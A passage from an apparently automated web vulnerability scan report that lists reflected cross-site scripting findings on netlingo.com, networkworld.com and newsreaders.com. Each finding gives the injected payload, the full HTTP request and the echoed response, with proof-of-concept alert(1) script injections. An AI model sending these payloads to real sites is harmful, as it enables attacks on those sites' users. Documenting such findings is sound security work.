The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 161dc"><a>6bdb1163c15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/fingerprint.php?161dc"><a>6bdb1163c15=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/fingerprint?161dc"><a>6bdb1163c15=1" />
...[SNIP]...

4.1325. http://www.netlingo.com/word/gadget.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/gadget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e51"><a>522c4e127ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/gadget.php?58e51"><a>522c4e127ce=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/gadget?58e51"><a>522c4e127ce=1" />
...[SNIP]...

4.1326. http://www.netlingo.com/word/gizmo.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/gizmo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39d82"><a>d22f30a3d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/gizmo.php?39d82"><a>d22f30a3d97=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/gizmo?39d82"><a>d22f30a3d97=1" />
...[SNIP]...

4.1327. http://www.netlingo.com/word/lm4azzzz.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/lm4azzzz.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e602f"><a>2c13ec09b5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/lm4azzzz.php?e602f"><a>2c13ec09b5a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/lm4azzzz?e602f"><a>2c13ec09b5a=1" />
...[SNIP]...

4.1328. http://www.netlingo.com/word/mih.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/mih.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1933"><a>5d0ab0d4558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/mih.php?d1933"><a>5d0ab0d4558=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/mih?d1933"><a>5d0ab0d4558=1" />
...[SNIP]...

4.1329. http://www.netlingo.com/word/next-generation.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/next-generation.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3863"><a>0b0755e8582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/next-generation.php?e3863"><a>0b0755e8582=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/next-generation?e3863"><a>0b0755e8582=1" />
...[SNIP]...

4.1330. http://www.netlingo.com/word/online-jargon.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/online-jargon.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f22d6"><a>2eff2181cca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/online-jargon.php?f22d6"><a>2eff2181cca=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/online-jargon?f22d6"><a>2eff2181cca=1" />
...[SNIP]...

4.1331. http://www.netlingo.com/word/ru18-2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/ru18-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef7b5"><a>f9a76007f4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/ru18-2.php?ef7b5"><a>f9a76007f4b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/ru18-2?ef7b5"><a>f9a76007f4b=1" />
...[SNIP]...

4.1332. http://www.netlingo.com/word/wtg4a.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.netlingo.com
Path:	/word/wtg4a.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4b5"><a>3bbfcd0a39f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/wtg4a.php?2e4b5"><a>3bbfcd0a39f=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/wtg4a?2e4b5"><a>3bbfcd0a39f=1" />
...[SNIP]...

4.1333. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db447'-alert(1)-'4497b15d2bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /communitydb447'-alert(1)-'4497b15d2bd/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Tue, 25 Jan 2011 05:07:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932058950579; path=/; expires=Thu, 24-Jan-13 05:07:38 GMT
Content-Length: 76772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
e: '(none)',
           subtopic: '',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/communitydb447'-alert(1)-'4497b15d2bd/blog/ebay-use-joomla-open-source-glue',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid =
...[SNIP]...

4.1334. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b9'-alert(1)-'9295e160622 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /community/blog631b9'-alert(1)-'9295e160622/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
nnCoection: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:08:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:08:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932083119661; path=/; expires=Thu, 24-Jan-13 05:08:03 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=lts7jggqt7mh4usckji1vi4kq5; expires=Thu, 17-Feb-2011 08:41:23 GMT; path=/; domain=.networkworld.com
Content-Length: 54336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang =
...[SNIP]...
,
           subtopic: '(none)',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/community/blog631b9'-alert(1)-'9295e160622/ebay-use-joomla-open-source-glue',
doc_uri: '/community/index.php',
site: '(none)',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid
...[SNIP]...

4.1335. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7ae6'-alert(1)-'d4cd0158299 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /community/blog/ebay-use-joomla-open-source-gluee7ae6'-alert(1)-'d4cd0158299 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
nnCoection: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:08:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:08:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932117258923; path=/; expires=Thu, 24-Jan-13 05:08:37 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=oi7cm0b0p4fmmc7550rogm6md1; expires=Thu, 17-Feb-2011 08:41:57 GMT; path=/; domain=.networkworld.com
Content-Length: 54336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang =
...[SNIP]...
ium: '(none)',
nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/community/blog/ebay-use-joomla-open-source-gluee7ae6'-alert(1)-'d4cd0158299',
doc_uri: '/community/index.php',
site: '(none)',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)";
var jq_request_uri =
...[SNIP]...

4.1336. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f64ea'-alert(1)-'4daf3508b09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /community/blog/ebay-use-joomla-open-source-glue?f64ea'-alert(1)-'4daf3508b09=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:05:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:05:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931913130479; path=/; expires=Thu, 24-Jan-13 05:05:13 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=psb6m4ok99kul7055oqd6e94g5; expires=Thu, 17-Feb-2011 08:38:33 GMT; path=/; domain=.networkworld.com
Content-Length: 95630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
um: '(none)',
nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/community/blog/ebay-use-joomla-open-source-glue?f64ea'-alert(1)-'4daf3508b09=1',
doc_uri: '/community/index.php',
site: 'subnet_opensource',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)";
var jq_r
...[SNIP]...

4.1337. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d36"><script>alert(1)</script>979ddc20d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/blog/ebay-use-joomla-open-source-glue?10d36"><script>alert(1)</script>979ddc20d91=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:04:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:04:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931877094828; path=/; expires=Thu, 24-Jan-13 05:04:37 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=rbs8ae2t272o95ekh27bolvf66; expires=Thu, 17-Feb-2011 08:37:57 GMT; path=/; domain=.networkworld.com
Content-Length: 95917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
<meta name="syndication-source" content="http://www.networkworld/community/blog/ebay-use-joomla-open-source-glue?10d36"><script>alert(1)</script>979ddc20d91=1" />
...[SNIP]...

4.1338. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adb44'-alert(1)-'f4fbd266c3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /newsadb44'-alert(1)-'f4fbd266c3e/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.1339. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc475'-alert(1)-'4d7477e29c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/2010dc475'-alert(1)-'4d7477e29c/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.1340. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f18f'-alert(1)-'8395c000953 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html6f18f'-alert(1)-'8395c000953 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Tue, 25 Jan 2011 05:07:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:07:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932041394853; path=/; expires=Thu, 24-Jan-13 05:07:21 GMT
Content-Length: 75204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
one)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/news/2010/100710-ebay-deploys-joomla-for-analytics.html6f18f'-alert(1)-'8395c000953',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)";
var jq_request_uri = "/news
...[SNIP]...

4.1341. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f45a'-alert(1)-'7a2e215cf42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html?8f45a'-alert(1)-'7a2e215cf42=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:04:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/news/2010/100710-ebay-deploys-joomla-for-analytics.html?8f45a'-alert(1)-'7a2e215cf42=1',
doc_uri: '/news/2010/100710-ebay-deploys-joomla-for-analytics.html',
site: 'infrastructuremgmt',
rxid: '222588',
nodeid: ''
};
}();
var
...[SNIP]...

4.1342. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.newsreaders.com
Path:	/unix/utilities.html/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b10"><script>alert(1)</script>bdf3ff46ede was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix74b10"><script>alert(1)</script>bdf3ff46ede/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2738

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">





<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
